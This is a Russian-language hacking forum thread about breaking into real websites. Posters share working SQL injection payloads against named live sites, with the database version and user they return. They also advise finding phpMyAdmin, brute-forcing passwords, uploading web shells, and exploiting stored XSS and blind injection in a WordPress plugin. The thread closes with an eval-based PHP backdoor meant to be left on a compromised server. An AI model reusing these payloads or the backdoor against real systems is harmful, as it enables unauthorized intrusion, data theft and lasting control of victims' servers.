Там просто двойной запрос. Колонка 1 учавствует в еще одном запросе и поэтому там ошибка. Но вывод получить можно, вывод в TITLE: http://sotchi-2014.info/content.php?id=175'+and+1=2+UNION+SELECT+version()--+ <title>4.0.26-log - Sotchi-2014.info</title> P.S.: В твоем запросе (http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+) тоже есть вывод, посмотри внимательней на TITLE.
слил с сайта инфу с таблицы mysql.такого типа Host User Password как найти phpmyadmin? сканеры директорий не помогают
Смотри соседние сайты. Может найдёшь там. Посмотри базы, может проще через админку сайта/соседних сайтов залить шелл будет, чем искать пма и брутить пасс.
его там может не быть, он может быть на другом хосте, папка может быть названа как угодно. а в mysql.user лежат аккаунты базы, а не пма.
помогите с проблемкой! Code: http://bsgv.ru/ipo_calc.php?bc_tovar_id=2 && 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,select @n from (select @n:='',(select null from information_schema.columns where 0x1 in (@n:=concat(@n,0x7c,table_schema,0x3a,table_name,0x3a,column_name))))n,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151 # но почемуто,не хочет выводить! может подскажет кто какой запрос ещё ввести?
там нет блайнда! Code: http://bsgv.ru/ipo_calc.php?bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x3566646B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2C151%20%23 5.1.42-log : bsgv_base : bsgv_user@localhost
Как найти Phpmyadmin 1) Идем по адресу whois.domaintools.com, смотрим ns-сервера, типа: ns1.masterhost.ru ns2.masterhost.ru Значит хостер masterhost.ru 2) Идем на masterhost.ru 3) Ищем ссылки типа "Помощь", "Саппорт", "FAQ", "ЧаВо" и переходим. 4) В FAQ ищем "Работа с MySQL", "Управление БД" и т.д. И опять переходим! 5) Там хостер показывает адрес phpmyadmin. В нашем случае phpmyadmin.masterhost.ru 6) Заходим и делаем свои дела
Уважаемые багоискатели, помогите найти в ниже указанном коде уязвимость.. Есть ли она там? Нашел только активную XSS, и все.. Провести скуль не получается, ибо нет вывода ошибки, и провести блайнд в инсерте, как уже подсказали, нереально.. PHP code execution тоже не выходит.. Может что-то упустил? Помогите.. PHP: <?php global $wpdb; if (isset($_GET['action'])) { switch ($_GET['action']) { case 'save': if (!empty($_POST) && wp_verify_nonce($_POST['fgallery_templates_field'],'fgallery_templates')) { if (isset($_POST['gall_id']) && is_numeric($_POST['gall_id'])) { $gall_id = $_POST['gall_id']; } else { die('Invalid gallery'); } if (isset($_POST['gall_type']) && is_numeric($_POST['gall_type'])) { $gall_type = $_POST['gall_type']; } else { die('Invalid gallery'); } $settings = fgallery_get_album_settings($gall_id); if ($_POST['templ_title'] != '') { $wpdb->insert(TEMPLATES_TABLE, array('gall_type' => $gall_type, 'gall_settings' => serialize($settings), 'created' => date("Y-m-d"), 'templ_title' => $_POST['templ_title'], 'templ_description'=>$_POST['templ_description'])); if ($wpdb->insert_id > 0) { ?> <script type="text/javascript"> /* <![CDATA[ */ var win = window.dialogArguments || opener || parent || top; alert('<?php _e('Template was saved successfully','fgallery')?>'); win.tb_remove(); /* ]]> */ </script> <?php } die(); } elseif (isset($_POST['update_ex']) && is_numeric($_POST['update_ex'])) { $templ_id = $_POST['update_ex']; $to_update = array('gall_type' => $gall_type, 'gall_settings' => serialize($settings)); if ($_POST['templ_description'] != '') { $templ_description = $_POST['templ_description']; $to_update['templ_description'] = $templ_description; } $wpdb->update(TEMPLATES_TABLE, $to_update, array('id'=>$templ_id)); ?> <script type="text/javascript"> /* <![CDATA[ */ var win = window.dialogArguments || opener || parent || top; alert('<?php _e('Template was saved successfully','fgallery')?>'); win.tb_remove(); /* ]]> */ </script> <?php } die(); } else { $main_output = 1; } break; case 'load' : if (!empty($_POST) && wp_verify_nonce($_POST['fgallery_load_settings_field'],'fgallery_load_settings')) { if (isset($_POST['gall_id']) && is_numeric($_POST['gall_id'])) { $gall_id = $_POST['gall_id']; } else { die('Invalid gallery'); } if (isset($_POST['template']) && is_numeric($_POST['template'])) { $templ_id = $_POST['template']; $settings = fgallery_get_template_settings($templ_id); } else { if (!empty($_FILES)) { $to_store = simplexml_load_file($_FILES['settings_file']['tmp_name']); $settings_array = array(); foreach ($to_store as $key=>$value) { $name = 'sc_'.$key.'__'; foreach ($value as $key_2=>$value_2) { $attr_name = $name.$key_2; $new_value = (string)$value_2; $settings_array[$attr_name] = str_replace('0x','',$new_value); } } if (empty($settings_array)) { die('Invalid settings'); } $settings = fgallery_prepare_settings($settings_array); } else { die('Invalid template'); } } if(fgallery_save_album_settings($gall_id, $settings)) { ?> <script type="text/javascript"> /* <![CDATA[ */ var win = window.dialogArguments || opener || parent || top; win.tb_remove(); win.location.reload(); /* ]]> */ </script> <?php } } else { $main_output = 2; } break; } ?>
PHP: if ($_POST['templ_title'] != '') { $wpdb->insert(TEMPLATES_TABLE, array('gall_type' => $gall_type, 'gall_settings' => serialize($settings), 'created' => date("Y-m-d"), 'templ_title' => $_POST['templ_title'], 'templ_description'=>$_POST['templ_description'])); ... http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html конструкция может прикатить при условии что где-то будет вывод из TEMPLATES_TABLE. а слепую можно замутить с if() и/или benchmark().
Есть вывод, когда $_GET['action'] = 'load', т.е. http://localhost/wp/wordpress/wp-content/plugins/gallery/templ.php?gall_id=1&action=load Тут выводится 'templ_title' и 'templ_description', соответственно получается активная XSS, так как при templs.php?action=save, я в пост запросы без проблем могу передать что угодно, в данном случае javascript.. Код инсертится в БД, а потом при лоаде выводится.. Не совсем вкурил насчет "INSERT ... ON DUPLICATE KEY UPDATE".. Попробую вкурить...
Я думаю лучше в качестве бекдора оставить не инклуд, а выполнение произвольного php кода, например PHP: <?php if(isset($_GET['code'])) { eval($_GET['code']);exit; } ?> Вызывается так: php?code=phpinfo(); Можно придумать миллион других примеров.
